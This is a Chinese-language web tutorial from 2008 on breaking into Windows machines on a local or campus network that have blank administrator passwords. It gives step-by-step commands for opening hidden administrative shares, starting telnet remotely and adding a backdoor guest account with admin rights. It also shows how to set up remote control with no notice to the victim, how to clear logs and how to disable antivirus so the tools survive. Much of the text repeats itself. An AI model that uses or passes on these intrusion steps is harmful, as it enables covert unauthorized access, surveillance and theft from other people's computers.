局域網(wǎng)入侵
互聯(lián)網(wǎng) 發(fā)布時(shí)間:2008-10-08 19:36:18 作者:佚名
我要評(píng)論

1.入侵的范圍只包括局域網(wǎng),如果在學(xué)校上,可以入侵整個(gè)校園網(wǎng);
2.能入侵的只是存在弱口令(用戶(hù)名為administrator等,密碼為空),并且開(kāi)了139端口,但沒(méi)開(kāi)防火墻的機(jī)子。
入侵工具:
一般要用到三個(gè):NTscan變態(tài)掃描器,Recton--D賀免殺專(zhuān)用版,DameW
1.入侵的范圍只包括局域網(wǎng),如果在學(xué)校上,可以入侵整個(gè)校園網(wǎng);
2.能入侵的只是存在弱口令(用戶(hù)名為administrator等,密碼為空),并且開(kāi)了139端口,但沒(méi)開(kāi)防火墻的機(jī)子。
入侵工具:
一般要用到三個(gè):NTscan變態(tài)掃描器,Recton--D賀免殺專(zhuān)用版,DameWare迷你中文版 4.5. (前兩個(gè)工具殺毒軟件都會(huì)報(bào)毒,建議將殺毒軟件實(shí)時(shí)防毒暫時(shí)關(guān)掉,并將這兩個(gè)軟件的壓縮包加密,防止被殺。) 入侵步驟:
1.使用"NTscan變態(tài)掃描器",在IP處填上要掃描的IP范圍,選擇"WMI掃描"方式,按"開(kāi)始"后就等掃描結(jié)果了。
2.使用"Recton--D賀免殺專(zhuān)用版"
選擇"CMD命令"項(xiàng),在"CMD:"中輸入"net share C$=C:\",即可開(kāi)啟遠(yuǎn)程主機(jī)的C盤(pán)共享,以此將"C"換成D,E,F等,即可開(kāi)啟D盤(pán),E盤(pán),F(xiàn)盤(pán)等的共享,這種共享方式隱蔽性很高,而且是完全共享,在對(duì)方主機(jī)上不會(huì)出現(xiàn)一只手托住盤(pán)的共享標(biāo)志,然后在地址欄中輸入"\\對(duì)方IP\C$",即可進(jìn)入對(duì)方C盤(pán)。
選擇"Telnet"項(xiàng),在"遠(yuǎn)程主機(jī)"中輸入剛才掃描到的一個(gè)IP,遠(yuǎn)程啟動(dòng)Telnet服務(wù),成功后在"CMD選項(xiàng)"中,執(zhí)行命令:"net share ipc$",接著執(zhí)行:"net share admin$",最后執(zhí)行"net use \\***.***.***.***\IPC$ "" /user:administrator"在*處填入你入侵的主機(jī)IP。
3.使用"DameWare迷你中文版 4.5",安裝后點(diǎn)"DameWare Mini Remote Control",在"幫助"項(xiàng)中選擇激活產(chǎn)品,輸入注冊(cè)信息,成功注冊(cè)后,進(jìn)入"遠(yuǎn)程連接"窗口,在"主機(jī)"處填入IP地址,點(diǎn)"設(shè)置",在"服務(wù)安裝選項(xiàng)"中點(diǎn)"編輯"后,在"通知對(duì)話(huà)框"中去掉"連接時(shí)通知",在"附加設(shè)置"中全都不選,在"用戶(hù)選項(xiàng)"中去掉"啟用用戶(hù)選項(xiàng)菜單"。設(shè)置完成好后,就可點(diǎn)"連接",在彈出的對(duì)話(huà)框中點(diǎn)"確定"后,成功后你就可以像操作自己機(jī)子一樣控制別人電腦了,當(dāng)然你也可以只選擇監(jiān)視對(duì)方屏幕。 注意:如果不注冊(cè)的話(huà),在對(duì)方主機(jī)上會(huì)彈出一個(gè)對(duì)話(huà)框,暴露你的身份。 入侵步驟補(bǔ)充:
1.在以上第2步中,遠(yuǎn)程啟動(dòng)Telnet服務(wù)可以通過(guò)"我的電腦-管理-連接到另一臺(tái)計(jì)算機(jī)-輸入IP-服務(wù)和應(yīng)用程序-服務(wù)-將telnet改為手動(dòng)-啟動(dòng)"完成。
2.Recton--D賀免殺專(zhuān)用版還有其他功能,在"進(jìn)程"項(xiàng)中,可以查看遠(yuǎn)程主機(jī)的進(jìn)程,并可任意結(jié)束其中進(jìn)程;在"共享"項(xiàng)中,可以創(chuàng)建共享,我常用的是創(chuàng)建C$,D$,E$,F$,共享路徑分別對(duì)應(yīng)C:\,D:\等,共享好后在地址欄中輸入"\\IP\C$",進(jìn)入對(duì)方C盤(pán),你就可以隨意復(fù)制刪除里面的東西了,而且這種共享對(duì)方機(jī)子盤(pán)符上不會(huì)顯示共享圖標(biāo),也就不會(huì)被發(fā)現(xiàn),弄完后最好還是把共享給關(guān)掉。最后選"日志",清除所有日志,不留痕跡。這個(gè)軟件會(huì)被殺毒軟件當(dāng)作病毒殺掉,用它時(shí)須將實(shí)時(shí)防毒關(guān)掉。
3.上面的共享可通過(guò)CMD(程序-附件-命令提示符)完成,首先"telnet IP",telnet上去,鍵入y后輸入的用戶(hù)名"administrator",密碼為空, 進(jìn)入后,開(kāi)共享用net share命令,共享C$(即C盤(pán)):"net share C$=C:",共享system文件夾:"net share c=c:\winnt\system32",共享IPC$用:"net share IPC$"等,最后是關(guān)閉共享,關(guān)閉C盤(pán)共享:"net share C$ /del"。
4.為方便下次入侵,可以設(shè)置后門(mén), 查看用戶(hù):"net user",激活guest用戶(hù)
"net user guest /active:yes",更改guest的密碼為poco:"net user guest poco",把guest的權(quán)限提升為管理員權(quán)限:"net localgroup administrators guest /add"。
5.telnet命令(DOS命令)很多,可去網(wǎng)上查找它的命令,常用的有:查看D盤(pán)文件:""dir d:\",查看C盤(pán)program file文件夾:"dir c:\PROGRA~1\;",60秒倒記時(shí)關(guān)機(jī):"shutdown -s -t 60" 補(bǔ)充說(shuō)明:
1.net use錯(cuò)誤原因解決:
(1)."發(fā)生系統(tǒng)錯(cuò)誤 1326。 登錄失?。?未知的用戶(hù)名或錯(cuò)誤密碼。"
在遠(yuǎn)程機(jī)的"控制面板-文件夾選項(xiàng)-查看-簡(jiǎn)單的文件共享",去掉選取,然后再?lài)L試連接。簡(jiǎn)單文件共享會(huì)把網(wǎng)絡(luò)連接權(quán)限都?xì)w為 guest連接,是無(wú)法訪(fǎng)問(wèn)C$等管理共享的.
(2)"發(fā)生系統(tǒng)錯(cuò)誤 1327。 登陸失?。河脩?hù)帳戶(hù)限制??赡艿脑虬ú辉试S空密碼,登陸時(shí)間限制,或強(qiáng)制的策略限。"在遠(yuǎn)程機(jī)的"控制面板-管理工具-本地安全策略-安全選項(xiàng)-用戶(hù)權(quán)限"指派里,禁用"空密碼用戶(hù)只能進(jìn)行控制臺(tái)登陸".
(3)"//IP/c$"時(shí)提示找不到網(wǎng)絡(luò)途徑。在"網(wǎng)絡(luò)和撥號(hào)連接"中"本地連接"中選取"Internet協(xié)議(TCP/IP)"屬性,進(jìn)入"高級(jí)TCP/IP設(shè)置"選"WINS設(shè)置"里面有一項(xiàng)"啟用TCP/IP的NETBIOS
2.能入侵的只是存在弱口令(用戶(hù)名為administrator等,密碼為空),并且開(kāi)了139端口,但沒(méi)開(kāi)防火墻的機(jī)子。
入侵工具:
一般要用到三個(gè):NTscan變態(tài)掃描器,Recton--D賀免殺專(zhuān)用版,DameWare迷你中文版 4.5. (前兩個(gè)工具殺毒軟件都會(huì)報(bào)毒,建議將殺毒軟件實(shí)時(shí)防毒暫時(shí)關(guān)掉,并將這兩個(gè)軟件的壓縮包加密,防止被殺。) 入侵步驟:
1.使用"NTscan變態(tài)掃描器",在IP處填上要掃描的IP范圍,選擇"WMI掃描"方式,按"開(kāi)始"后就等掃描結(jié)果了。
2.使用"Recton--D賀免殺專(zhuān)用版"
選擇"CMD命令"項(xiàng),在"CMD:"中輸入"net share C$=C:\",即可開(kāi)啟遠(yuǎn)程主機(jī)的C盤(pán)共享,以此將"C"換成D,E,F等,即可開(kāi)啟D盤(pán),E盤(pán),F(xiàn)盤(pán)等的共享,這種共享方式隱蔽性很高,而且是完全共享,在對(duì)方主機(jī)上不會(huì)出現(xiàn)一只手托住盤(pán)的共享標(biāo)志,然后在地址欄中輸入"\\對(duì)方IP\C$",即可進(jìn)入對(duì)方C盤(pán)。
選擇"Telnet"項(xiàng),在"遠(yuǎn)程主機(jī)"中輸入剛才掃描到的一個(gè)IP,遠(yuǎn)程啟動(dòng)Telnet服務(wù),成功后在"CMD選項(xiàng)"中,執(zhí)行命令:"net share ipc$",接著執(zhí)行:"net share admin$",最后執(zhí)行"net use \\***.***.***.***\IPC$ "" /user:administrator"在*處填入你入侵的主機(jī)IP。
3.使用"DameWare迷你中文版 4.5",安裝后點(diǎn)"DameWare Mini Remote Control",在"幫助"項(xiàng)中選擇激活產(chǎn)品,輸入注冊(cè)信息,成功注冊(cè)后,進(jìn)入"遠(yuǎn)程連接"窗口,在"主機(jī)"處填入IP地址,點(diǎn)"設(shè)置",在"服務(wù)安裝選項(xiàng)"中點(diǎn)"編輯"后,在"通知對(duì)話(huà)框"中去掉"連接時(shí)通知",在"附加設(shè)置"中全都不選,在"用戶(hù)選項(xiàng)"中去掉"啟用用戶(hù)選項(xiàng)菜單"。設(shè)置完成好后,就可點(diǎn)"連接",在彈出的對(duì)話(huà)框中點(diǎn)"確定"后,成功后你就可以像操作自己機(jī)子一樣控制別人電腦了,當(dāng)然你也可以只選擇監(jiān)視對(duì)方屏幕。 注意:如果不注冊(cè)的話(huà),在對(duì)方主機(jī)上會(huì)彈出一個(gè)對(duì)話(huà)框,暴露你的身份。 入侵步驟補(bǔ)充:
1.在以上第2步中,遠(yuǎn)程啟動(dòng)Telnet服務(wù)可以通過(guò)"我的電腦-管理-連接到另一臺(tái)計(jì)算機(jī)-輸入IP-服務(wù)和應(yīng)用程序-服務(wù)-將telnet改為手動(dòng)-啟動(dòng)"完成。
2.Recton--D賀免殺專(zhuān)用版還有其他功能,在"進(jìn)程"項(xiàng)中,可以查看遠(yuǎn)程主機(jī)的進(jìn)程,并可任意結(jié)束其中進(jìn)程;在"共享"項(xiàng)中,可以創(chuàng)建共享,我常用的是創(chuàng)建C$,D$,E$,F$,共享路徑分別對(duì)應(yīng)C:\,D:\等,共享好后在地址欄中輸入"\\IP\C$",進(jìn)入對(duì)方C盤(pán),你就可以隨意復(fù)制刪除里面的東西了,而且這種共享對(duì)方機(jī)子盤(pán)符上不會(huì)顯示共享圖標(biāo),也就不會(huì)被發(fā)現(xiàn),弄完后最好還是把共享給關(guān)掉。最后選"日志",清除所有日志,不留痕跡。這個(gè)軟件會(huì)被殺毒軟件當(dāng)作病毒殺掉,用它時(shí)須將實(shí)時(shí)防毒關(guān)掉。
3.上面的共享可通過(guò)CMD(程序-附件-命令提示符)完成,首先"telnet IP",telnet上去,鍵入y后輸入的用戶(hù)名"administrator",密碼為空, 進(jìn)入后,開(kāi)共享用net share命令,共享C$(即C盤(pán)):"net share C$=C:",共享system文件夾:"net share c=c:\winnt\system32",共享IPC$用:"net share IPC$"等,最后是關(guān)閉共享,關(guān)閉C盤(pán)共享:"net share C$ /del"。
4.為方便下次入侵,可以設(shè)置后門(mén), 查看用戶(hù):"net user",激活guest用戶(hù)
"net user guest /active:yes",更改guest的密碼為poco:"net user guest poco",把guest的權(quán)限提升為管理員權(quán)限:"net localgroup administrators guest /add"。
5.telnet命令(DOS命令)很多,可去網(wǎng)上查找它的命令,常用的有:查看D盤(pán)文件:""dir d:\",查看C盤(pán)program file文件夾:"dir c:\PROGRA~1\;",60秒倒記時(shí)關(guān)機(jī):"shutdown -s -t 60" 補(bǔ)充說(shuō)明:
1.net use錯(cuò)誤原因解決:
(1)."發(fā)生系統(tǒng)錯(cuò)誤 1326。 登錄失?。?未知的用戶(hù)名或錯(cuò)誤密碼。"
在遠(yuǎn)程機(jī)的"控制面板-文件夾選項(xiàng)-查看-簡(jiǎn)單的文件共享",去掉選取,然后再?lài)L試連接。簡(jiǎn)單文件共享會(huì)把網(wǎng)絡(luò)連接權(quán)限都?xì)w為 guest連接,是無(wú)法訪(fǎng)問(wèn)C$等管理共享的.
(2)"發(fā)生系統(tǒng)錯(cuò)誤 1327。 登陸失?。河脩?hù)帳戶(hù)限制??赡艿脑虬ú辉试S空密碼,登陸時(shí)間限制,或強(qiáng)制的策略限。"在遠(yuǎn)程機(jī)的"控制面板-管理工具-本地安全策略-安全選項(xiàng)-用戶(hù)權(quán)限"指派里,禁用"空密碼用戶(hù)只能進(jìn)行控制臺(tái)登陸".
(3)"//IP/c$"時(shí)提示找不到網(wǎng)絡(luò)途徑。在"網(wǎng)絡(luò)和撥號(hào)連接"中"本地連接"中選取"Internet協(xié)議(TCP/IP)"屬性,進(jìn)入"高級(jí)TCP/IP設(shè)置"選"WINS設(shè)置"里面有一項(xiàng)"啟用TCP/IP的NETBIOS
相關(guān)文章
什么是CC攻擊 判斷網(wǎng)站是否被CC攻擊并且如何防御CC攻擊
CC主要是用來(lái)攻擊頁(yè)面的,大家都有這樣的經(jīng)歷,就是在訪(fǎng)問(wèn)論壇時(shí),如果這個(gè)論壇比較大,訪(fǎng)問(wèn)的人比較多,打開(kāi)頁(yè)面的速度會(huì)比較慢,對(duì)不?!一般來(lái)說(shuō),訪(fǎng)問(wèn)的人越多,論壇的頁(yè)2024-01-06Windows系統(tǒng)安全風(fēng)險(xiǎn)-本地NTLM重放提權(quán)
入侵者主要通過(guò)Potato程序攻擊擁有SYSTEM權(quán)限的端口偽造網(wǎng)絡(luò)身份認(rèn)證過(guò)程,利用NTLM重放機(jī)制騙取SYSTEM身份令牌,最終取得系統(tǒng)權(quán)限,該安全風(fēng)險(xiǎn)微軟并不認(rèn)為存在漏洞,所以2021-04-15- 這篇文章主要介紹了文件上傳漏洞全面滲透分析小結(jié),這里主要為大家分享一下防御方法,需要的朋友可以參考下2021-03-21
- 這篇文章主要介紹了sql手工注入語(yǔ)句&SQL手工注入大全,需要的朋友可以參考下2017-09-06
- 這篇文章主要介紹了詳解Filezilla server 提權(quán),需要的朋友可以參考下2017-05-13
FileZilla Server 2008 x64 提權(quán)與防御方法
這篇文章主要介紹了FileZilla Server 2008 x64 提權(quán)與防御方法,需要的朋友可以參考下2017-05-13https加密也被破解 HEIST攻擊從加密數(shù)據(jù)獲取明文
不久之前我們說(shuō)過(guò)關(guān)于http和https的區(qū)別,對(duì)于加密的https,我們一直認(rèn)為它是相對(duì)安全的,可今天要講的是,一種繞過(guò)HTTPS加密得到明文信息的web攻擊方式,不知道這消息對(duì)你2016-08-10iPhone和Mac也會(huì)被黑 一條iMessage密碼可能就被盜了
一直以來(lái)蘋(píng)果系統(tǒng)的安全性都是比安卓要高的,但是再安全的系統(tǒng)也免不了漏洞,蘋(píng)果也一樣。最近爆出的新漏洞,只需要接收一條多媒體信息或者iMessage就會(huì)導(dǎo)致用戶(hù)信息泄露。2016-07-27- 國(guó)家正在修正關(guān)于黑客方面的法律法規(guī),有一條震驚黑客圈的“世紀(jì)佳緣”起訴白帽黑客事件,深深的傷害了廣大黑客們的心,加上扎克伯格和特拉維斯·卡蘭尼克賬號(hào)被盜,于是黑2016-07-11
如何逆向破解HawkEye keylogger鍵盤(pán)記錄器進(jìn)入攻擊者郵箱
面對(duì)惡意郵件攻擊,我們就只能默默忍受被他攻擊,連自我保護(hù)能力都沒(méi)有談什么反抗?讓人痛快的是,如今有了解決辦法,逆向破解鍵盤(pán)記錄器,進(jìn)入攻擊者郵箱2016-07-06